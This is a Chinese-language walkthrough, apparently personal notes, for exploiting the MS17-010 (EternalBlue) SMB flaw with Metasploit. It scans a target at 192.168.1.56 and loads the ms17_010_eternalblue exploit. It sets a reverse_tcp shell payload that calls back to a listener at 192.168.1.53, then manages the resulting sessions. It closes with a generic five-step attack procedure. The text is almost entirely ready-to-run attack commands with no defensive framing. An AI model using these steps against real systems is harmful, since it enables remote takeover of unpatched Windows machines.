扫描目标是否存在该漏洞
search ms17-010
找到其中的辅助扫描模块并载入
use auxiliary/scanner/smb/smb_ms17_010 show options # 查看使用的参数选项
可见需要RHOSTS参数(即远程主机的IP),这里假设为192.168.1.56
set rhosts 192.168.1.56
开始扫描run
发现目标易受攻击,存在相关漏洞。
攻击模块加载与配置
查找攻击模块(永恒之蓝)并加载
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
show options
需要设置目标主机IP地址 RHOSTSset RHOSTS 192.168.1.56
查看可以利用的目标主机类型show targets
可以看到这个模块只有一个 target,所以默认就选择这个目标系统。不需要手动设置。
search windows/x64/shell type:payload
选择其中的第3个:反弹shell的payload。加载:
set payload windows/x64/shell/reverse_tcp
查看payload需要配置的信息
show options
设置本机的监听地址LHOST
set LHOST 192.168.1.53
配置完成,开始运行
exploit
(敲回车)等待反弹shell
解决回显乱码问题
在Win7的shell中利用chcp命令更改编码为65001即Unicode (UTF-8)
chcp 65001
保存会话
在执行时,运行
exploit -j
-j 表示后台执行 渗透目标完成后会创建一个 session 我们可以通过 session 连接目标主机。
查看sessions会话
sessions
通过id进入相应的session
sessions -i [Id]
保存到后台
background
结束会话
sessons -k [Id]
MSF攻击步骤在获取会话后,如果没有回显,可以敲一下回车
1、查找 CVE 公布的漏洞
2、查找对应的 exploit 模块
3、配置模块参数
4、添加 payload 后门
5、执行 exploit 开始攻击